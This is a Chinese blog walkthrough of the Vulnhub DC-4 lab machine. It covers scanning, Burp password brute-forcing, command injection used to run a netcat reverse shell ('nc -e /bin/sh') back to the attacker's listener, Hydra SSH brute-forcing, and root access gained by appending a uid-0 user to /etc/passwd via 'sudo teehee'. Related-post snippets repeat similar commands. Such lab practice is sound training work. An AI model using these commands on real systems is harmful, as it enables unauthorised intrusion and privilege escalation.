Vulnhub靶机:DC-4渗透详细过程

于 2024-04-29 01:17:30 发布
阅读量432 收藏 4
点赞数 5
文章标签: 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/timeless_cz/article/details/138296659
版权

 靶机下载地址放在文章最后啦

一、靶机的搭建  

1.打开文件夹右击使用VM虚拟机打开

2.给虚拟机取个名字(我这里就直接DC-3),选择自己虚拟机存放的位置

3.等待虚拟机的导入

4.直接打开虚拟机

二、渗透过程  

1.使用nmap扫一下存活的IP地址

我这里IP地址有点多,14这台机子应该就是DC-3靶机IP了

nmap -sn 10.189.160.10-20

2.使用nmap扫一下开放的端口

nmap -A -sV -p- 10.189.160.14

3.发现开放了 80和22端口,先访问80端口看看    

4.使用whatweb探测一下网站的指纹信息

whatweb -v http://10.189.160.14/

5.直接使用burb爆破账号和密码

发送到intruder    

把password设置成变量

导入字典进直接进行爆破

看数据返回的长度 最后得到密码为 happy

6.登陆进来点击Command发现可以执行命令

7.使用burp 对run抓包 修改包内容达到执行命令的效果

使用whoami看一下执行命令的权限    

8.使用nc来反弹shell

在本机终端打开监听

nc -lvp 7788

添加命令反弹shell到监听机上

nc -e /bin/sh 10.180.0.3:7788 这里要使用+进行拼接

nc+-e+/bin/sh+10.180.0.3+7788

已经成功拿到shell了

9.使用python进去交互式界面

python -c "import pty;pty.spawn('/bin/bash')"

10.在home目录下发现有三个用户 jim里面发现了东西    

把密码复制出来在kali上面新建一个pass.txt的字典

11.使用 hydra 爆破前面扫到的22端口 ssh服务

hydra -l jim -P passwd.txt 10.189.160.14 ssh

12.使用jim登陆ssh服务

ssh jim@10.189.160.14

查看mbox是一封邮件

13.进入Linux的邮箱目录打开jim发现了charles 的密码

    14.切换用户到charles 发现一个teehee用户可以使用root无密码权限

14.查看root权限格式

root:x:0:0:root:/root:/bin/bash字段1:用户名。字段2:密码占位符,x代表有密码。字段3:用户的uid,如果一个用户uid为0则表示该用户超级管理员。字段4:用户的gid,也就是所属用户组的id。字段5:用户信息(弃用)。字段6:用户家目录。字段7:用户登陆系统后使用的shell。

15.我们以仿照root权限创建一个用户写到/etc/passwd文件里去

无密码版

echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

再次打开/etc/passwd就能看见我们创建的了

直接切换hack用户 已成功提权到root了

有密码版    

先使用下面命令生成密码

perl -le 'print crypt("123456", "aa")'
密  码:123456加密后:aaAN1ZUwjW7to

添加密码到命令里面并执行

echo "hack2:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd

16.进入root目录最后拿到flag了

    

记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我

后台回复"DC-4"即可获得靶场地址

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

菜鸟学渗透
关注
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2003
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub DC-4
Pai_Space
02-17 614
描述: 只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...
vulnhub-dc4
bqnagus
10-05 1206
vulnhub-dc4靶机复现
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 463
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
vulnhub靶机DC-4
m0_52328368的博客
08-19 1190
vulnhubdc-4详细步骤
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2549
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3712
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-9渗透详细过程DC系列完结)
IerkeU的博客
03-28 3826
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2836
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 492
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1812
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
靶机渗透DC-4
最新发布
2301_76227305的博客
03-31 875
这个靶机主要是九头蛇的使用,还要了解一点点命令执行漏洞和teehee提权,这个teehee比较小众,我也是第一次见。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
VulnHubDC-4
weixin_39219503的博客
01-31 297
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下,只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
Vulnhub-DC-4
KAKA的博客
07-04 311
扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标,获取系统信息和开放端口:80 && 22 nmap -A -p- 192.168.67.135 (初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路) 登陆 http://192.168.67.135 : 首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用 页面上写着:Admin Information
VulnHub DC: 4
spider的博客
12-01 258
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
[Vulnhub] DC-4
weixin_63231007的博客
01-28 917
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
[VulnHub]DC-4
cosmoslin的博客
09-07 153
VulnHub——DC-4渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.130 目标账号:未知 目标主机:未知 信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试 进入网站 发现需要登录,提示admin登录,猜测用户名
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值